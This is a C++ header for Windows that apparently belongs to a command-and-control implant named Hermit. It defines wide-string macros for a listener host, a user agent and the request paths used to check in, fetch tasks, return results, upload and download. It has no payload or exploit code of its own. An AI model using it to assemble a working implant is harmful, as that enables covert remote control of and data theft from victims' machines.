#ifndef HERMIT_TYPES_HPP
#define HERMIT_TYPES_HPP

#include <windows.h>
#include <winhttp.h>

// #pragma comment(lib, "winhttp.lib")

// A function to convert from string to wide string
#define WIDEN(x) WIDEN2(x)
#define WIDEN2(x) L##x

#ifdef LISTENER_HOST
#define LISTENER_HOST_W WIDEN(LISTENER_HOST)
#endif

#ifdef LISTENER_USER_AGENT
#define LISTENER_USER_AGENT_W WIDEN(LISTENER_USER_AGENT)
#endif

#ifdef REQUEST_PATH_CHECKIN
#define REQUEST_PATH_CHECKIN_W WIDEN(REQUEST_PATH_CHECKIN)
#endif

#ifdef REQUEST_PATH_DOWNLOAD
#define REQUEST_PATH_DOWNLOAD_W WIDEN(REQUEST_PATH_DOWNLOAD)
#endif

#ifdef REQUEST_PATH_TASKGET
#define REQUEST_PATH_TASKGET_W WIDEN(REQUEST_PATH_TASKGET)
#endif

#ifdef REQUEST_PATH_TASKRESULT
#define REQUEST_PATH_TASKRESULT_W WIDEN(REQUEST_PATH_TASKRESULT)
#endif

#ifdef REQUEST_PATH_UPLOAD
#define REQUEST_PATH_UPLOAD_W WIDEN(REQUEST_PATH_UPLOAD)
#endif

#ifdef REQUEST_PATH_WEBSOCKET
#define REQUEST_PATH_WEBSOCKET_W WIDEN(REQUEST_PATH_WEBSOCKET)
#endif

#endif // HERMIT_TYPES_HPP